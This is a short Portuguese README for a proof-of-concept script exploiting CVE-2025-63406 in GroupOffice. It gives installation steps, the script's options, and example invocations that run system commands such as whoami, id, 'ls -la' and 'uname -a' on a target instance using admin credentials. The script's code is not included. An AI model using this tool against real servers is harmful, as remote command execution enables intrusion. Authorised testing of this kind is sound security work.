
Pequeno PoC para automatizar a exploração de CVE-2025-63406.
# Instalar dependências
pip install -r requirements.txt
# Ou usar um ambiente virtual
python3 -m venv venv
source venv/bin/activate # No Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 CVE-2025-63406.py -u <URL> -n <USUÁRIO> -p <SENHA> -c <COMANDO>
-u, --url: URL base da instância do GroupOffice (ex.: http://localhost:9090)-n, --username: Nome de usuário para autenticação-p, --password: Senha para autenticação-c, --command: Comando do sistema a ser executado (ex.: whoami, id, ls -la)# Executar comando whoami
python3 CVE-2025-63406.py -u http://localhost:9090 -n admin -p password -c whoami
# Executar comando id
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c id
# Listar arquivos no diretório atual
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "ls -la"
# Obter informações do sistema
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "uname -a"

⚠️ Esta ferramenta é apenas para testes autorizados. Acesso não autorizado a sistemas de computador é ilegal.